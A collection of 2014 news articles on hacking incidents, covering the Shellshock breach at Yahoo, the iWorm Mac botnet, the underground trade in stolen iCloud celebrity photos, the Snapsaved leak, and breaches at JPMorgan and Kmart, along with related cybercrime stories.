Security researcher Jonathan Hall says he has found evidence that Romanian hackers used the Shellshock bug to gain access to Yahoo servers, according to a post on his website Future South.
The Shellshock bug can be used by hackers to control servers using a vulnerability in Linux and Unix. The problem has existed for over 20 years, but it was only discovered in September. If a hacker gains access to a server using the Shellshock bug, they could see everything that is stored there.
Hall, a technology consultant and Unix expert, outlined in his post the process he used to track down the hacked Yahoo servers. Hall used a Google search to find servers that had been left vulnerable to Shellshock. He discovered that the WinZip.com domain was being used by hackers to track down other servers that could be vulnerable to the bug.
Hall went on to find that Romanian hackers had gained access to Yahoo's servers, and were gradually exploring the network in search of the popular Yahoo! Games servers. Yahoo's games are played by millions of people, making them a target for hackers looking to wreak havoc. Through his research, Hall discovered that two of Yahoo's servers had been breached by hackers, and that more could have already been accessed.
In an email to Bloomerg Businesseek, Yahoo confirmed that three of its servers had been hacked using the Shellshock vulnerability. Company spokesperson Elisa Shyu said, "As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network, we isolated a handful of our impacted servers and at this time we have no evidence of a compromise to user data.”
Yahoo's servers were vulnerable to attack because they were using an old version of server technology Bash. Hall emailed and tweeted Marissa Mayer, as well as a member of Yahoo's engineering team. Eventually he received a response from Yahoo that confirmed its servers had been breached and that it was working through its incident response process. Hall claims that Yahoo refused to pay him for the discovery because it claims that it is not part of the company's bug bounty program.
Yahoo has come under fire in the past for its response to security researchers who uncover bugs in its servers. In 2013 the CEO of a security firm was awarded a $25 voucher for Yahoo-branded items after he uncovered three bugs in Yahoo's online services.
In his first major television interview, the director of the FBI has warned that Chinese hackers have embarked on a widespread campaign of cyberwarfare against the US.
There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.
When asked whether Chinese hackers were particularly good at gaining access to servers belonging to US companies, Comey said the hackers were not actually skilled when it came to covering their tracks.
I liken them a bit to a drunk burglar. They're kicking in the front door, knocking over the vase, while they're walking out with your television set. They're just prolific. Their strategy seems to be: We'll just be everywhere all the time. And there's no way they can stop us.
Comey said Chinese hackers were not looking to profit from stolen credit-card details or to find personal information. Instead, they're looking for something similar to trade secrets that can be used in China:
[They're looking for] information that's useful to them so they don't have to invent [it]. They can copy or steal to learn about how a company might approach negotiations with a Chinese company, all manner of things.
"60 Minutes" host Scott Pelley asked Comey how much Chinese hackers were costing the US economy. He said the cost was impossible to count but was likely in the billions.
Apple has added the dangerous iWorm bug to its malware detector after 17,000 Mac users were found to have been infected with the virus.
Business Insider reported on Friday that a Russian security firm discovered a piece of malicious software known as "Mac.BackDoor.iWorm." that was being found on Mac computers around the world. The bug gave hackers control of the computer and could have been used to send spam emails, crash websites, or mine Bitcoin. However, there's no evidence that hackers even got the chance to use their botnet before it was discovered.
Mac Rumors reported on Saturday that Apple updated its Xprotect software to protect against the iWorm program. Xprotect is the anti-virus program that comes installed with every Apple computer, so Mac users are theoretically safe from iWorm if their operating system is up to date.
Here's the updated Xprotect code that shows Apple has added iWorm to the list of blocked programs:
The iWorm virus was controlled in an inventive way. The virus searched Reddit for a fake discussion forum for the video game Minecraft that contained links to command servers operated by hackers.
After the security firm Dr. Web announced the discovery of the bug, the Reddit account the hackers used to share links to their commands servers was closed. Over the weekend, Reddit banned the fake Minecraft subreddit, meaning the iWorm bug had no way to receive orders from the hackers controlling it.
Additionally, an anonymous tipster told The Safe Mac how iWorm spread. It's reported that the virus spread to Mac computers using pirated software downloads hosted on The Pirate Bay. Anybody who downloaded fake versions of Adobe Photoshop, Adobe Illustrator, Microsoft Office, and Parallels from a Pirate Bay user named "aceprog" were asked for administrator access to install the pirated software. After a user approved the access, iWorm was able to install itself on the user's computer.
Some dealers say the celebrity-photo-trading industry died on the afternoon of Labor Day 2014. An anonymous pornography collector, "OriginalGuy," did the unthinkable and set about uploading his entire collection of stolen photographs to the notorious porn forum AnonIB — hundreds of images of 101 different actresses and singers. When users discovered what was happening, they swarmed the site. Eventually he was unable to load the forum to post any more images, so he took to 4chan, the anarchic discussion forum read by thousands.
That's when people really started to notice what was going on.
Hours after OriginalGuy shared hundreds of stolen photographs of female celebrities, the media began to realize what had happened. At first, they weren't sure how to report on the incident. Gossip blogger Perez Hilton re-uploaded stolen naked photographs to his site, and he was forced to issue an apology hours later due to widespread outrage. TMZ, the celebrity news site famed for breaking stories of hacking and sex scandals, took hours to publish anything on the leaked images. It looked like this was a world-first: Hackers had infiltrated Apple's iCloud service and made away with a seemingly endless trove of stolen photographs. But for those in the know, this wasn't new. Rather, it signaled the death of a thriving underground industry that had existed online for years.
This is the story of that death, and the way it led within days to a reconstitution of the marketplace in a new home, where it thrives today.
/stol/, Short For "Stolen"
The pornography forum AnonIB was started in May 2006, formed as an offshoot site of the notorious anonymous message board 4chan. The site was controversial from its very inception. AnonIB has struggled to prevent its users from posting child porn on the site, which includes the subforums "Teens (18+)" and "Drunk/Passed Out." One board proved particularly popular: /stol/, short for "Stolen" and "Obtained Pictures." For years, /stol/ served as a kind of advertising system, almost like a Craigslist for hackers.
Here's the kind of ad users see on AnonIB. This French hacker advertises his services as a "ripper" who can steal naked photographs from iCloud accounts:
But after OriginalGuy posted his trove of photos online, AnonIB was immediately taken down. For two weeks, the site said it was undergoing "scheduled maintenance." The truth was that the site's anonymous operator was scrubbing the site of any incriminating evidence that linked the porn forum to the iCloud hacks.
When AnonIB came back online, every post in the /stol/ forum had been deleted. Thousands of stolen photographs and hundreds of ads for iCloud hackers had been removed. The internet's celebrity-photo-trading ring gradually realized that its central hub had been compromised.
Nonetheless, some dedicated users returned, asking for help in stealing photographs of women. They were cautioned from posting on the site, warned that journalists were monitoring AnonIB for information about how iCloud accounts were illegally accessed.
The mass leak of celebrity photos (dubbed "The Fappening" by fans amazed at the scale of the collection) forced would-be photo leakers to take to private forums and chatrooms. They communicate using a network of monikers, encrypted emailed addresses, and Google-hosted Blogger pages.
Google's Servers Host A Thriving Market In Hacked Pictures
One of the new hubs for stolen photographs of celebrities is a blog known as "Abi Wins." It's public and available for anyone to view. Abi Wins is also hosted on Google's Blogspot servers, which is unfortunate for the company that so keenly defended itself against an accusing letter from top Hollywood lawyer Marty Singer.
In his note to Google founders Larry Page and Sergey Brin, as well as chairman Eric Schmidt, Singer accused Google of failing to remove photographs from its Blogger service. Google responded to the letter, defending its moderation procedures, remarking:
We've removed tens of thousands of pictures — within hours of the requests being made — and we have closed hundreds of accounts. The Internet is used for many good things. Stealing people’s private photos is not one of them.
The Abi Wins blog is used to index stolen photographs of celebrities obtained by accessing iCloud accounts. Users then discuss the latest leaked images using Chatango, a chatroom tool created by programmers from MIT, Caltech, and Berkeley. Business Insider contacted Chatango to inform them of the chatroom, and it was deleted. We also reached out to Google about Blogspot and will update this post when we hear back.
But the Abi Wins blog is just the public gateway to the internet's celebrity-photo-trading ring, which lives on despite the increased press attention that occurred following the Labor Day leak.
The New Home For Stolen Pictures
The celebrity-photo fans who used to gather on AnonIB have a new home on the internet: Volafile. The German site offers real-time file sharing for large groups of people, along with a chat facility to discuss the files posted. The site allows the creation of anonymous accounts, and it offers fast upload speeds. For iCloud hackers with collections of celebrity photos to offload, Volafile is a dream come true. New celebrity photo leaks are now emerging almost exclusively through Volafile.
When a photo collector is about to leak new stolen photographs, that person posts excited messages, creating hype for whatever is about to appear online.
The left of this screenshot shows the chatroom discussion of leaked images, and the list on the right shows files uploaded to the room. A user named "realpsamathe" is excitedly announcing a new celebrity leak, posting "HERE WE GO." in the chat:
"realpsamathe" uploaded a large video file named "THE ONE YOU'VE BEEN WAITING FOR." The file was a video sent by actress Abigail Spencer, known for her roles in "Cowboys & Aliens" and the TV show "Suits," to her boyfriend, actor Josh Pence, who starred in "The Dark Knight" and "The Social Network."
Chatroom users rushed to thank realpsamathe for posting the stolen video.
As users downloaded and viewed the stolen video, which had just been shared online for the first time, they offered to send Bitcoin donations to realpsamathe. He declined, saying, "I don't want donations." He instructed users to "go donate somewhere meaningful" and shared a link to a Unicef donation page to help fight Ebola in Africa.
The Trade In Photos Of Under-Age Celebrities
Users constantly request photographs of the 18-year-old Olympic gymnast McKayla Maroney and actress Bella Thorne, who is just 17. Naked photographs of both women are said to have leaked online as part of the iCloud leak, with the photographs taken while both were underage. That hasn't stopped celebrity-photo fans requesting that others post the child pornography online. Every request results in a debate over the ethics of child pornography.
New photographs and videos of female celebrities are still being posted online on a daily basis. "OriginalGuy," the person who first leaked the images, seems to have gone silent, but other established photo traders have realized that the industry is all but dead and are offloading their collection for Bitcoin (and the adoration of their peers) using chatrooms like Volafile.
When Business Insider contacted Volafile founder N. Kuhnhenn, the chatrooms were deleted, along with the content hosted on Volafile and the backup chatrooms reserved for "emergency use." Kuhnhenn told Business Insider that he deletes rooms that breach the site's terms of use as he finds them.
Yet Another Massive Cache Of Celebrity Photos Is Poised To Leak
But there's an even more secretive side to the online photo-trading industry. Private dealers still operate, using encrypted email accounts and fake names to avoid detection. After observing the conversations in the main Volafile chatroom, Business Insider learned that a dealer named "Sets Ahoy" had a substantial collection of unreleased images, potentially equal in size to the "OriginalGuy" collection that was posted online on Labor Day. (A "set" is a collection of images, usually about a dozen.)
Using cached versions of deleted messages on the anonymous note site Pastebin, Business Insider was able to contact Sets Ahoy through his encrypted email address. Posing as a potential buyer, Business Insider messaged the photo dealer. We didn't specify what we were looking to buy, just that we had heard he was reliable. Sets Ahoy replied within hours, telling us, "You came to the right guy." He sent over his catalogue of stolen celebrity photographs and videos without any prompting. Here it is in full:
Continuing to pose as an interested buyer, we expressed interest in the photographs of the British model Daisy Lowe. No stolen photographs of Lowe have leaked online. If Sets Ahoy were to possess them, it would help to prove there may be thousands of stolen photographs yet to be released.
Minutes after we expressed our interest in the Daisy Lowe photographs, Sets Ahoy replied with a price.
For about $350 (roughly one bitcoin), Sets Ahoy was selling a collection of stolen naked celebrity photographs. To prove that he was in possession of the photographs, Sets Ahoy sent a Dropbox link to a sample photograph from the Daisy Lowe set. The photograph apparently shows Lowe in a hotel bathroom with an unnamed male. Their genitals are obscured by black bars, and Sets Ahoy's email address is watermarked over the image. Sample photographs are intentionally censored by traders to reduce their value and prevent other dealers from selling the same collections. Minutes after Sets Ahoy uploaded the sample to Dropbox, he deleted it to avoid detection from Dropbox's illegal content filters. Business Insider contacted Dropbox for comment on this story, and we will update this post when we hear back from them.
Sets Ahoy sent Business Insider a Bitcoin payment address, which could be used to send him the one bitcoin he requested in payment for the stolen photographs. The address was newly created, showing no previous transactions. It's likely that it would have been deleted immediately after payment was processed, which makes sure that Sets Ahoy remains anonymous. Business Insider did not purchase any photographs, and the sample image was deleted as soon as it was received. We contacted Daisy Lowe's representatives prior to publication to inform them that their client was a target of iCloud hackers, and that stolen photographs of her were circulating online.
Hundreds Or Thousands Of Photos Have Been Stolen
The collection of photographs that OriginalGuy posted online on Labor Day is by no means the full extent of the stolen material that photo traders possess. Dealers like Sets Ahoy have hundreds, possibly thousands, of photographs and videos of female actresses that they are seeking to offload. Some traders realized that OriginalGuy's leak changed the underground industry forever, and so they have taken to leaking the images online for free, as realpsamathe has been doing on Volafile.
It's difficult for Hollywood lawyers like Marty Singer to clamp down on the spread of stolen photographs online. For every blog shut down, and every chatroom deleted, the community of people hungry for more content moves on to another site. It's difficult to see where the community will move next, although the trend is to adopt more private networks.
There has been talk of a "deepweb" marketplace for stolen celebrity photographs, accessible only through the Tor web browser. Tor is constructed so that no search engine would be able to index that auction site, and nobody would be able to discover it without knowing the unique series of letters and numbers that form the URL. Until the dealers flock to the deepweb, however, the signs of the internet's underground photo-trading ring remain: Cached pages, notes, emails, and forums linger online for lawyers, journalists, curious internet users, and potential buyers to discover.
Hackers likely obtained the photographs of Smith by accident after accessing the iCloud account of his former girlfriend.
The collection of photographs leaked online today appears to be the same series of images that a stolen photo dealer attempted to sell to Business Insider for 1 bitcoin (around $350). After learning of the existence of the photographs, Business Insider contacted Daisy Lowe's representatives to inform them that their client had been targeted by hackers.
No male celebrities are known to have been specifically targeted by the iCloud hackers, instead their photos usually turn up by accident.
Naked photographs of actor Dave Franco were part of the "OriginalGuy" leak that took place on Labor Day. However, those images only emerged after hackers were looking for photographs of actress Alison Brie.
The only other male celebrity implicated in the iCloud hack has been Nick Hogan. It's claimed that naked photographs of the reality television star were part of a trove of images obtained from his iCloud account, along with photographs of his mother in underwear and images of his former girlfriends. The hackers are likely to have hacked the account in search of the photographs showing Hogan's underage girlfriends.
The hackers behind the celebrity leaks continue to post photographs online on a regular basis, as Business Insider previously reported. Attempts to shut down their forums and chatrooms have been futile, as they simply move to new sites and continue sharing stolen photographs.
If you’re one of the millions of people whose name and contact information fell into the hands of hackers who attacked JPMorgan Chase, prepare yourself: You may be targeted by attempts to pry out more critical information.
While the bank hasn’t detected any fraud and says all money is safe, the breach exposed the names, addresses, phone numbers and email addresses tied to 76 million households and 7 million small businesses. There was no sign of stolen account numbers, passwords, user identifications, birthdates or Social Security numbers, Chase says.
What you should do
Given this massive exposure of customer contact information, people affected should be on the lookout for spam emails, phone calls and text messages, says Avivah Litan, a vice president and distinguished analyst at Gartner Research, an information technology research company. Fraudsters may be looking to take advantage of you through techniques known as phishing.
“We’re already seeing a lot of these spam emails and texts and phone calls as a result of previous breaches, so this is just going to add to it,” Litan says. “All the data is being collected and sold on the black market, and different criminals buy it for different reasons.”
If you receive suspicious messages or calls, don’t give out credit card digits, Social Security numbers, or any other private information. Banks will never ask for this by email, so if someone does request it, you’re probably dealing with a fraudster.
Don’t trust, do verify
Consumers shouldn’t necessarily trust communications that explicitly mention the name of Chase or any other bank.
“I would envision that a lot of the phishing exploits would mention Chase specifically,” says Doug Johnson, a senior vice president at the American Bankers Association. “What the phisher is trying to do is send you something which you would have a reasonable expectation of opening up.”
Chase also warns consumers not to click on links or open attachments to fishy emails. To avoid being reeled into one of these traps by telephone, if you get a suspicious call from someone claiming to be from the bank, hang up, call the bank and ask to be connected, or visit a branch in person. Chances are the call was a phishing expedition.
Chase customers aren’t the only ones who should take precautions, Johnson says.
“This was a marketing database; it wasn’t a customer database,” he says of the Chase target the hackers breached. “So while a majority of the data will be of customers, there will be some non-customer data in there as well.”
“[People] can’t stop the theft of the data, but they can stop the use of the stolen data in terms of harming them,” Litan says.
Report suspicious activity
With this security breach – affecting the largest number of people of any known incursion to date – and recent attacks on Target, Michaels, Neiman Marcus and Home Depot, it’s obvious that successful hacks are becoming more common. Therefore, all consumers should check their credit and debit account statements regularly to look for unauthorized purchases.
Report any suspicious activity to your card issuer, bank or credit union immediately to avoid potential liability; the sooner you speak up, the more likely you are to get your money back, Litan says.
Small business owners should take the same precautions and train their employees, including bookkeepers and treasurers, to be wary of potential scams, Litan says.
Additionally, you may want to place a fraud alert on your credit report, change passwords and consider identity theft protection services, the Consumer Bankers Association advised earlier this month. For more safety tips, check out this handy guide. With a little luck and some proactive steps now, you may avoid the pain that having your credit and bank accounts hacked can cause.
A giant database of intercepted Snapchat photos and videos has been released by hackers who have been collecting the files for years. Shocked users of the notorious chat forum 4chan are referring to the hack as "The Snappening," noting that this is far bigger in scale than the iCloud hacks that recently targeted celebrities.
Underground photo trading chatrooms have been filled in recent weeks with hints that something big was coming. Thursday night it finally arrived: A third-party Snapchat client app has been collecting every single photo and video file sent through it for years, giving hackers access to a 13GB library of Snapchats that users thought had been deleted.
Users of 4chan have downloaded the files, and are currently in the process of creating a searchable database allowing people to search the stolen images by Snapchat username.
The database of Snapchat files posted online was hosted on viralpop.com, a fake competition website that installed malicious software on the computers of users trying to take part. That site has now been suspended and taken offline, although thousands of people have already downloaded the collection of Snapchats.
This is what the collection of intercepted Snapchat photos and videos looked like:
There are 2 Sites That May Have Been Hacked
One news report suggests the hacked third-party Snapchat client was Snapsave. The popular Android app allowed users to keep Snapchat photos and videos, which automatically delete when viewed through the official Snapchat app.
But an anonymous photo trader contacted Business Insider to tell us that the site affected was actually SnapSaved.com. The service acted as a web client for the Snapchat app that allowed users to receive photos and videos, and save them online. What its users didn't realize was that the site was quietly collecting everything that passed through it, storing incriminating Snapchats on a web server, with the usernames of senders attached.
This is what SnapSaved looked like in October 2013:
SnapSaved disappeared several months ago. Now the URL redirects to a Danish e-commerce site that sells set-top boxes and television antennas. Most of the intercepted Snapchat photographs posted online featured overlaid messages in Danish.
4chan users claim that SnapSaved was indeed the source of the intercepted files:
We don't know whether the third-party Snapchat client, whether Snapsave or SnapSaved, was created with the purpose of intercepting images. It may have been the case that hackers accessed the servers of one of the sites, which had inadvertently stored the files, and rehosted the directory online.
4chan users say the collection of photos has a large amount of child pornography, including many videos sent between teenagers who believed the files would be immediately deleted after viewing. Half of Snapchat's users are teenagers between the ages of 13 and 17.
BEIJING (Reuters) - Anonymous, the nebulous online activist group that uses hacking to further causes it supports, has threatened a major blackout of Chinese and Hong Kong government websites, and to leak tens of thousands of government email address details.
The group, under the banner of 'Operation Hong Kong' or '#OpHongKong' and '#OpHK' on Twitter, said on Friday it will launch a mass effort against Chinese government servers to bring down their websites via Distributed Denial of Service (DDoS) attacks on Saturday.
DDoS attacks attempt to cripple networks by overwhelming them with Internet traffic.
"Here's your heads up, prepare for us, try to stop it, the only success you will have will be taking all your sites offline," an Anonymous statement posted online said. "China, you cannot stop us. You should have expected us before abusing your power against the citizens of Hong Kong."
Demonstrations in Hong Kong have seen the use of tear gas, violent clashes and mass disruptions to business and traffic as people campaign for the right to democratically elect the Asian financial hub's leader.
Hong Kong's refusal so far to negotiate with protesters, and a police reaction that many labeled as heavy-handed, has sparked widespread condemnation that has now spread to Anonymous, which often campaigns for civil liberties by attacking people or institutions it sees as opponents of those rights.
"If this is true, it will show that the Chinese government is a victim of internet hacking," saidForeign Ministry spokesman Hong Lei at a daily news briefing. "China has consistently stressed our opposition to all internet hacking attack activities. We rebuke the acts of this organization."
"This kind of internet attack violates the law and social morals, and we have already reported it to the police," it said, adding that the website was running normally again.
"Prepping for massive DDoS attacks, Database dumps, etc... Will be destroying #ChinaGovernment," wrote one Anonymous participant on Twitter.
China's Defense Ministry, in a statement sent to Reuters, said its website was subject to numerous hacking attacks every day from both home and overseas.
"We have taken necessary steps to protect the safe operation of the Defense Ministrywebsite," it added.
Kmart on Friday confirmed that its systems were breached by hackers who were able to steal credit and debit card data for customers shopping in its retail stores since early September to October 9, when the breach was discovered. It’s not clear at this time how many customers may have been affected or how many Kmart stores have been hit, as the company is yet to announce any numbers.
However, Kmart did say that “based on the forensic investigation to date, no personal information, no debit card PIN numbers, no email addresses and no social security numbers were obtained by those criminally responsible.” The company said there’s no evidence that any Kmart shopper was impacted, and added that it’ll be offering free credit monitoring protection to customers that have shopped in Kmart stores during the period.
Kmart says its systems were attacked by a new form of malware, which has been removed by its security team.
Sears spokesman Chris Brathwaite also confirmed the hack, Krebs on Security reports, saying that Kmart systems “were infected with a form of malware that was currently undetectable by anti-malware systems. Our IT teams quickly removed that malware, however we do believe that debit and credit card numbers have been compromised.” Sears said that its Sears tores have not been hit by a similar attack.
It’s not clear whether the hack is related in any way to similar breaches that occurred at Home Depot or Target, to name just a couple of prominent credit card heists that took place in the last 12 months.
One of the anonymous developers of a third-party Snapchat client has claimed that hackers managed to break into his site, confirming the source of the 100,000 Snapchat photos and videos that leaked online last week in an event known as "The Snappening."
In the Facebook post, Snapsaved claim that a misconfiguration in its Apache server caused the site's database of saved Snapchat photos and videos to become vulnerable to hackers. This meant that hackers were able to access the trove of nearly 100,000 files and post them online at another site.
A post on anonymous note site Pastebin had accused the administrators of Snapsaved of intentionally providing hackers with access to the site's store of saved images. In the new Facebook post, Snapsaved denies this claim.
Snapsaved goes on to deny that usernames were leaked along with the images, which means that rumors of a searchable database of the images are likely false. Posters on 4chan had claimed that the usernames of the teenagers shown in the explicit photographs were leaked along with the images themselves. They claimed that a database was being built that would allow people to search the archive of stolen photographs by username.
Here are 4chan users discussing the rumored database:
Snapsaved claims that it took the site offline as soon as it realized that it had been hacked. Users appear to have believed that Snapsaved let them save their Snapchat photos on their own devices; they didn't know that the pictures were also being saved on servers owned by Snapsaved. There is no evidence that Snapsaved had attempted to alert users of the site that their saved Snapchat photos and videos had leaked. Instead, the snapsaved.com URL was changed to redirect to a shopping website.
The Facebook post also confirms that the majority of Snapsaved users were either Swedish, Norwegian or American. Snapsaved goes on to claim that it previously reported users to Swedish and Norwegian authorities, signaling that whoever runs the site had been viewing the private images sent through it.
The Snapsaved hack has raised serious concerns over the security of Snapchat's API. Over half of the app's users are aged between 13 and 17, but it's trivially easy for developers to reverse-engineer the app's API to create a third-party app or website that saves photos and videos that are intended to be deleted upon receipt.
It had previously been feared that hackers created Snapsaved with the sole purpose of intercepting explicit photos and videos of children. Snapsaved's statement seems to dispel this theory, instead increasing concern over the security of Snapchat's support for external developers.
In a statement released following the Snapsaved hack, Snapchat blamed its users for downloading and using third-party apps to save Snapchats. They cautioned against the use of any Snapchat apps that aren't developed by the company, warning that these sites are prohibited by the company's terms of use.
Here's the full Facebook post from the Snapsaved developer:
I would like to elaborate on the recent events regarding Snapsaved.com. Snapsaved.com was a website used to save SnapChat's, precisely as the app snapsave. In response to recent media events and the statement made by http://pastebin.com/cJcTbNz8, I would like to inform the public that snapsaved.com was hacked, the dictionary index the poster is referring to, was never publicly available. We had a misconfiguration in our Apache server. SnapChat has not been hacked, and these images do not originate from their database. Snapsaved has always tried to fight child pornography, we have even gone as far, as to reporting some of our users to the Swedish and Norwegian authorities. As soon as we discovered the breach in our systems, we immediately deleted the entire website and the database associated with it. As far as we can tell, the breach has effected 500MB of images, and 0 personal information from the database. The recent rumors about the snappening are a hoax. The hacker does not have sufficient information to live up to his claims of creating a searchable database. Our users had to consent to all the content they received via SnapSaved.com, as we mentioned, we tried to cleanse the database of inappropriate images as often as possible. The majority of our users are Swedish, Norwegian and American. I sincerely apologize on the behalf of snapsaved.com we never wished for this to happen. We did not wish to cause SnapChat or their users any harm, we only wished to provide a unique service.
Crystal Grave was sitting in a cafe in Menlo Park, California, on Thursday night when she received an email letting her know that someone had mentioned the name of her company. She'd set up a Google Alert to notify her whenever a blogger or journalist posted anything online mentioning the name of her event-planning search engine: Snappening.
Sure enough, journalists began to mention Snappening en masse in the coming hours, as reports emerged that a third-party Snapchat app had been hacked, and almost 100,000 private photos and videos had leaked online. Many of the images were explicit images of children. Online commenters had dubbed the event "The Snappening," a combination of "Snapchat" and "Happening," and a pun on the nickname of the last mass photo leak, "the Fappening."
Grave quickly realized that the leak of tens of thousands of private photos was an opportunity to promote her business. Speaking to Business Insider, Grave explained how her company watched press coverage of the hack:
Our team is enjoying seeing the discussion in social media locally, nationally and internationally...It’s been fun engaging with such a wide audience in real-time from across the globe.
As she noticed people talking about the hack online, Grave made sure that her company cashed in by creating an ad, or a "meme" as she is keen to call it. Here's the tie-in ad Snappening produced to coincide with the photo hack that targeted thousands of children around the world.
We asked Grave whether she had seen any new business resulting from the Snapchat hack:
Our web traffic on www.snappening.com has increased dramatically. We estimate we’ll have served more than 100,000 new visitors by the time the #TheSnappening hack runs its course as an international news phenomenon. While the incident is really only about four days old, we’ve already seen new registered user accounts and have started receiving phone calls of interest from across the country ... I think it has successfully increased the awareness of our brand without negative consequences.
Last night an anonymous hacker claimed to be in possession of 7 million passwords to Dropbox accounts. While that claim was probably false, it demonstrates the increasingly common way that hackers are using to gain access to your passwords.
The hacker posted around 400 usernames and passwords on anonymous note site Pastebin in a series of "teasers" for the main list. Some Reddit users were able to successfully log into Dropbox using the information posted before the company deactivated all of the leaked passwords.
So where do the passwords come from? After all, they worked, for a time.
The most likely source of the information is a third-party site that had poor security. Hackers know that most internet users re-use their passwords, so they often target smaller apps made by amateur developers. These easy targets have poor security — so usernames, passwords or files may be stored in a way that's easy for hackers to steal them.
The recent Snapchat hack, which saw nearly 100,000 private photos and videos posted online, happened because an amateur developer hadn't securely set up his website. In a post on the Snapsaved Facebook page, the site's anonymous founder explains that a mis-configured Apache server left the files vulnerable to hackers.
Hackers don't need to try and target the tech giants anymore. Why bother trying to hack into Google, Apple or Facebook's servers when you can simply take advantage of a poorly built website to get the same information?
We're now seeing hackers use a new approach. Instead of spending months finding vulnerabilities in large sites, they re-use login information stolen from amateur third-party apps. Chances are that the information works for several sites, so compiling these caches of data together can quickly create a list of millions of passwords.
In September, Russian hackers published a list of 5 million passwords to a variety of different email providers, including Gmail. It wasn't a new leak, but a collection of older password leaks compiled together to seem new. Sure, many of the email accounts had closed, but the information could still be downloaded and used by hackers to break into other accounts.
So why are hackers re-using old information? There's rarely evidence that they actually use the passwords to log into sites. Instead, it seems like they just post the information online. Or at least, they post some of the information online. As we mentioned before, hackers leak partial collection of passwords as "teasers." This is often accompanied by a request for Bitcoin donations.
We can use the public nature of Bitcoin addresses to see just how much hackers gain for posting passwords online. It's often less than they expect to receive. The hacker who shared the collection of Dropbox passwords received just 8 cents. Similarly, OriginalGuy, the anonymous forum poster behind the first wave of hacked iCloud celebrity photos, expressed dismay at the small trickle of donations that came his way, remarking:
Sure, I got $120 with my Bitcoin address, but when you consider how much time was spent acquiring this stuff (I'm not the hacker, just a collector), and the money (I paid a lot via Bitcoin as well to get certain sets when this stuff was being privately traded on Friday/Saturday) I really didn't get close to what I was hoping for.
We're seeing more and more passwords leak online. Amateur developers aren't stepping up password security, and existing leaks continue to resurface. While the information made public is often several years out of date (many of the emails posted along with the Dropbox passwords were deactivated in 2012), it's still valuable to hackers compiling large lists of email addresses and passwords to be used in attacks against other sites.
And, just in case it isn't clear, this is your fault, too: If you're using the same passwords over and over with different apps then hackers don't need to get into Apple or Facebook's servers to find them. They simply identify the smaller apps with the weakest password security.
Hackers have their very own underground market for buying and selling our stolen data, and it's only becoming more sophisticated.
According to the RAND Corporation's most recent report on cybercrime, the hackers' black market first emerged in Warsaw Pact countries in the late 1980s when the countries' many programmers and mathematicians suddenly found themselves out of work. The market was paper-based instead of cyber and revolved mainly around identity theft. Hackers usually acted alone.
The chart below, also taken from the RAND report, shows just how far that market has come. While most hacker activity still occurs in Russia and Eastern Europe, the hackers' marketplace is now dominated by more disciplined, organized, and structured groups with specialized targets and advanced hacker toolkits.
According to the RAND report, cybercriminals will continue to update their tools as it becomes harder for them to hack into our computers.
RAND acknowledges that people will likely become more savvy about cybersafety and install more encryption and protection measures onto their devices. However, cybercriminals will update their tools to keep up with these advances.
As the graphic below shows, the black market has also taken on a fairly rigid hierarchical structure as more people have gotten involved.
Since the 1980s, the level of technical knowledge needed to implement a cyber attack has declined. Now, almost any computer-literate person can enter the market. This has caused more and more people with varying levels of hacking abilities to enter into the market looking for "freelance" work and hackers-for-hire.
The hierarchy is eerily similar to that of the illegal drug trade. Anyone can be a mule, but getting to the top requires personal connections and a good reputation. In certain respects, reports RAND, the black market can be even more profitable than the illegal drug trade: goods and services can be distributed worldwide with the click of a button, leading to direct and immediate end results.
Between December 2013 and February 2014, a high-profile seller named Rescator sold over 5 million stolen credit cards. That's a giant figure. Group-IB reports that in the last year the marketplace has only seen 5.5 million new stolen cards listed, meaning that Rescator dominates the site.
But it's not just the SWIPED card site that Rescator operates on. He also runs his own illegal marketplaces for card data, including rescator.so, rescator.cc, rescator.la, among others.
Being a major player in the stolen credit card industry does make an individual more vulnerable being hacked themselves. Softpedia reports that one of Rescator's sites was hacked in March, defaced with a message, and a Will Smith music video.
Here's what the site looked like after it had been hacked:
Rescator is also connected to the 2013 credit card hack that affected up to 70 million Target hackers. His username is found in the source code of Kaptoxa, the malware program that hackers used to to gain access to Target's point of sale systems and steal the credit card data.
A 2013 investigation by journalist Brian Krebs led him to discover a man living in Ukraine who may be Rescator: Andrey Hodirevski. Krebs traced Rescator's online post history and websites, using it to develop a picture of the hacker's life. He found photos of Hodirevski that matched photos of Rescator that had been uploaded to a variety of hacking forums. However, there's no proof that Hodirevski is Rescator.
Microsoft is scrambling to issue a Windows update after security researchers discovered a flaw in PowerPoint that hackers are using to seize control of computers.
Computer World reports that the security problem affects all of the currently supported releases of Windows. The vulnerability was discovered by three Google employees and two staff of McAfee Security.
Hackers can use the flaw to send a target an infected PowerPoint presentation. When opened, the file will ask for certain permissions to display it. Most users, unaware of the security risks from files downloaded over the internet, will simply click to grant permissions. Once they've done that, hackers have control over the computer and can quietly intercept its web traffic.
In an advisory notice on its site, Microsoft warned that it was aware of "limited, targeted attacks" taking place using the PowerPoint vulnerability. The company says it is currently investigating the problem, and it may issue a security update to protect users. In the mean time, Microsoft has released a security workaround to block infected PowerPoint files.
In a misguided marketing and fundraising stunt, the founder of a car rental app hacked into the voice mail of angel investor Jason Calacanis and changed the message to promote his company.
“My whole life has been focused around using new and experimental methods to promote ideas,” he wrote. “Therefore, when we decided to raise a new round for our startup, I knew we had to something unique if we wanted to get attention.”
“Hey guys, we temporarily borrowed Jason Calacanis’ voicemail,” he says on the message.
Well, attention he got.
Zolty posted a link to the Medium post on Hacker News which apparently was also removed by administrators. Hacker News readers were not amused.
“Ethical quandaries aside (of which there are several) for a moment, I think this strategy speaks poorly of the startup,” said one comment. “What type of signal does it send to prospective investors that you feel it’s necessary to pull illegal stunts in order to gain attention for your round?”
Initially, Calacanis was surprised.
Insane. Someone hacked my voicemail and changed my outgoing message to get me to invest. http://t.co/PTtjq289bX
Zolty was part of the Winter 2013 Y Combinator batch for another startup, BeatDeck. Finding himself on the wrong end of a backlash, Zolty also apologized to Calacanis.
I just wanted to take a moment to sincerely apologize to @jason publicly. Been in contact, he's a great sport, and I admire him so much.
South Korea's spy agency said on Wednesday that North Korea used infected mobile games to hack the phones of over 20,000 South Koreans.
The Korea Times reports that the National Intelligence Service has accused the North Korean government of using its hacker army to disguise spying software as mobile apps. The games were linked to on websites popular in South Korea, and people then downloaded the apps.
The South Korean government hasn't released details on the hacked apps, which it now says it has removed.
